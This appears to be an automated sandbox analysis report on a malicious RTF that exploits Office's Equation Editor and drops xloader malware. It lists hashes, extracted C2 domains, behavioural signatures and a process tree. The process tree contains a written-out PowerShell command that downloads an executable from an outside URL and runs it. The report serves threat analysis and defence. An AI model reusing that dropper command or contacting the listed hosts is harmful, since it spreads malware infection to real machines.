Analysis
-
max time kernel
150s -
max time network
91s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
04-03-2021 17:47
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
Resource
win10v20201028
General
-
Target
SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
-
Size
267KB
-
MD5
174339ee0b1d50af956d16c7608a787e
-
SHA1
70f7dda70f239b16afcd1e7818075237c53abbc5
-
SHA256
9e9f12d14bd6918e39116f6a1c8017ecf3cd93a37c760b67175c0332d429526e
-
SHA512
f7a7c1ff8cb032582f8695cb927e1429d8b355547b67a96dfb8834fd43e8891bd6a660c70935c910ba0ee2cb1f20a8d83bc42aab04db310b85fbadab8897527a
Malware Config
Extracted
http://bppgov.ng/gotv.exe
Extracted
xloader
http://www.pardsoda.com/w25t/
nowayinlocksmith.com
bookaprovider.com
joybirder.com
decoracerrado.com
preciousmonments.com
96kixx.com
parentseducationalco-op.com
cbdandbtc.com
santanadeliciasymas.com
finecharlottehomes.com
themanibox.com
backupasia.com
buffalodetailstore.com
iprdo.com
croce-komeko.com
bluechipsgroup.company
truyencow.com
globalism.online
oicrafts.com
naturalawakeningsprograms.com
findsurreydeltahomes.com
dressing.cat
tavazonfund.com
defichair.com
str8firekennels.com
lenskart.site
salahdinortho.com
3tothrive.com
watchsdeals.com
plethoracosmetics.net
kentland33store.com
abbaszawawi.com
resepmasakankita.info
tomschoices.net
xn--livezoty-bpb.com
sixteen3handscottages.com
elliesuesews.com
mylordismyshepherd.com
chaing-list.xyz
asesorgrupovivir.com
kicked2theothercurb.com
nemahealthcare.com
allsalesvinyl.net
crystal-beachclub.com
mprose.net
chooseone.xyz
glasgowldn2009.com
getyourquan.com
nailpolishng.com
myeunoiateacompany.com
tobaccomangalt.com
honggedichan.com
beleafagency.com
zhonghuixingyue.com
fitnessworldexample.com
skdocm.club
buygenerations.com
aressdsg.com
auberge-escotais.com
claritycleaningsystems.com
riru300.com
aserchofalltrades.com
blackholidayco.com
bookclubspeakers.com
Signatures
-
Xloader Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1168-54-0x0000000000401000-0x0000000000541000-memory.dmp xloader behavioral1/memory/368-60-0x0000000000080000-0x00000000000A9000-memory.dmp xloader -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 368 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Wb.exepid process 604 Wb.exe -
Loads dropped DLL 7 IoCs
Processes:
powershell.exeWb.exeWb.exepid process 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 604 Wb.exe 1168 Wb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
powershell.exeWb.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\sackcloths Wb.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Wb.exeWb.exepid process 604 Wb.exe 1168 Wb.exe 1168 Wb.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Wb.exeWb.exesystray.exedescription pid process target process PID 604 set thread context of 1168 604 Wb.exe Wb.exe PID 1168 set thread context of 1276 1168 Wb.exe Explorer.EXE PID 368 set thread context of 1276 368 systray.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1924 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exeWb.exesystray.exepid process 368 powershell.exe 368 powershell.exe 1168 Wb.exe 1168 Wb.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe 368 systray.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
Wb.exeWb.exesystray.exepid process 604 Wb.exe 1168 Wb.exe 1168 Wb.exe 1168 Wb.exe 368 systray.exe 368 systray.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeWb.exesystray.exedescription pid process Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 1168 Wb.exe Token: SeDebugPrivilege 368 systray.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEWb.exepid process 1924 WINWORD.EXE 1924 WINWORD.EXE 604 Wb.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
WINWORD.EXEEQNEDT32.EXEcmd.exepowershell.exeWb.exeExplorer.EXEsystray.exedescription pid process target process PID 1924 wrote to memory of 1972 1924 WINWORD.EXE splwow64.exe PID 1924 wrote to memory of 1972 1924 WINWORD.EXE splwow64.exe PID 1924 wrote to memory of 1972 1924 WINWORD.EXE splwow64.exe PID 1924 wrote to memory of 1972 1924 WINWORD.EXE splwow64.exe PID 1724 wrote to memory of 1668 1724 EQNEDT32.EXE cmd.exe PID 1724 wrote to memory of 1668 1724 EQNEDT32.EXE cmd.exe PID 1724 wrote to memory of 1668 1724 EQNEDT32.EXE cmd.exe PID 1724 wrote to memory of 1668 1724 EQNEDT32.EXE cmd.exe PID 1668 wrote to memory of 368 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 368 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 368 1668 cmd.exe powershell.exe PID 1668 wrote to memory of 368 1668 cmd.exe powershell.exe PID 368 wrote to memory of 604 368 powershell.exe Wb.exe PID 368 wrote to memory of 604 368 powershell.exe Wb.exe PID 368 wrote to memory of 604 368 powershell.exe Wb.exe PID 368 wrote to memory of 604 368 powershell.exe Wb.exe PID 604 wrote to memory of 1168 604 Wb.exe Wb.exe PID 604 wrote to memory of 1168 604 Wb.exe Wb.exe PID 604 wrote to memory of 1168 604 Wb.exe Wb.exe PID 604 wrote to memory of 1168 604 Wb.exe Wb.exe PID 604 wrote to memory of 1168 604 Wb.exe Wb.exe PID 1276 wrote to memory of 368 1276 Explorer.EXE systray.exe PID 1276 wrote to memory of 368 1276 Explorer.EXE systray.exe PID 1276 wrote to memory of 368 1276 Explorer.EXE systray.exe PID 1276 wrote to memory of 368 1276 Explorer.EXE systray.exe PID 368 wrote to memory of 1740 368 systray.exe cmd.exe PID 368 wrote to memory of 1740 368 systray.exe cmd.exe PID 368 wrote to memory of 1740 368 systray.exe cmd.exe PID 368 wrote to memory of 1740 368 systray.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\Wb.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c PowerShell "try{$xcHZX=$env:temp+'\Wb.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://bppgov.ng/gotv.exe', $xcHZX);(New-Object -com Shell.Application).ShellExecute( $xcHZX);}catch{}"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell "try{$xcHZX=$env:temp+'\Wb.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://bppgov.ng/gotv.exe', $xcHZX);(New-Object -com Shell.Application).ShellExecute( $xcHZX);}catch{}"3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Wb.exe"C:\Users\Admin\AppData\Local\Temp\Wb.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Wb.exe"C:\Users\Admin\AppData\Local\Temp\Wb.exe"5⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
C:\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
C:\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
\Users\Admin\AppData\Local\Temp\Wb.exeMD5
1da73d4931cd6893f7b9fc765225a62d
SHA1cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA25612e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18
-
memory/368-14-0x0000000004950000-0x0000000004951000-memory.dmpFilesize
4KB
-
memory/368-27-0x0000000006230000-0x0000000006231000-memory.dmpFilesize
4KB
-
memory/368-63-0x0000000000A00000-0x0000000000A8F000-memory.dmpFilesize
572KB
-
memory/368-15-0x0000000004952000-0x0000000004953000-memory.dmpFilesize
4KB
-
memory/368-16-0x0000000001250000-0x0000000001251000-memory.dmpFilesize
4KB
-
memory/368-17-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/368-19-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/368-21-0x0000000006080000-0x0000000006081000-memory.dmpFilesize
4KB
-
memory/368-26-0x00000000060C0000-0x00000000060C1000-memory.dmpFilesize
4KB
-
memory/368-58-0x0000000000000000-mapping.dmp
-
memory/368-34-0x00000000061F0000-0x00000000061F1000-memory.dmpFilesize
4KB
-
memory/368-35-0x00000000062D0000-0x00000000062D1000-memory.dmpFilesize
4KB
-
memory/368-12-0x0000000000E60000-0x0000000000E61000-memory.dmpFilesize
4KB
-
memory/368-11-0x000000006B2A0000-0x000000006B98E000-memory.dmpFilesize
6.9MB
-
memory/368-9-0x0000000000000000-mapping.dmp
-
memory/368-61-0x00000000020F0000-0x00000000023F3000-memory.dmpFilesize
3.0MB
-
memory/368-60-0x0000000000080000-0x00000000000A9000-memory.dmpFilesize
164KB
-
memory/368-13-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/368-59-0x0000000000CE0000-0x0000000000CE5000-memory.dmpFilesize
20KB
-
memory/604-41-0x0000000000000000-mapping.dmp
-
memory/604-45-0x0000000000430000-0x000000000043B000-memory.dmpFilesize
44KB
-
memory/1168-55-0x000000001E8D0000-0x000000001EBD3000-memory.dmpFilesize
3.0MB
-
memory/1168-56-0x000000001E770000-0x000000001E780000-memory.dmpFilesize
64KB
-
memory/1168-51-0x00000000001B0000-0x00000000002B0000-memory.dmpFilesize
1024KB
-
memory/1168-54-0x0000000000401000-0x0000000000541000-memory.dmpFilesize
1.2MB
-
memory/1168-49-0x00000000004018E4-mapping.dmp
-
memory/1276-57-0x0000000003C40000-0x0000000003D7B000-memory.dmpFilesize
1.2MB
-
memory/1668-8-0x0000000000000000-mapping.dmp
-
memory/1724-7-0x0000000075AE1000-0x0000000075AE3000-memory.dmpFilesize
8KB
-
memory/1736-53-0x000007FEF6680000-0x000007FEF68FA000-memory.dmpFilesize
2.5MB
-
memory/1740-62-0x0000000000000000-mapping.dmp
-
memory/1924-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1924-3-0x00000000705A1000-0x00000000705A3000-memory.dmpFilesize
8KB
-
memory/1924-2-0x0000000072B21000-0x0000000072B24000-memory.dmpFilesize
12KB
-
memory/1972-6-0x000007FEFC021000-0x000007FEFC023000-memory.dmpFilesize
8KB
-
memory/1972-5-0x0000000000000000-mapping.dmp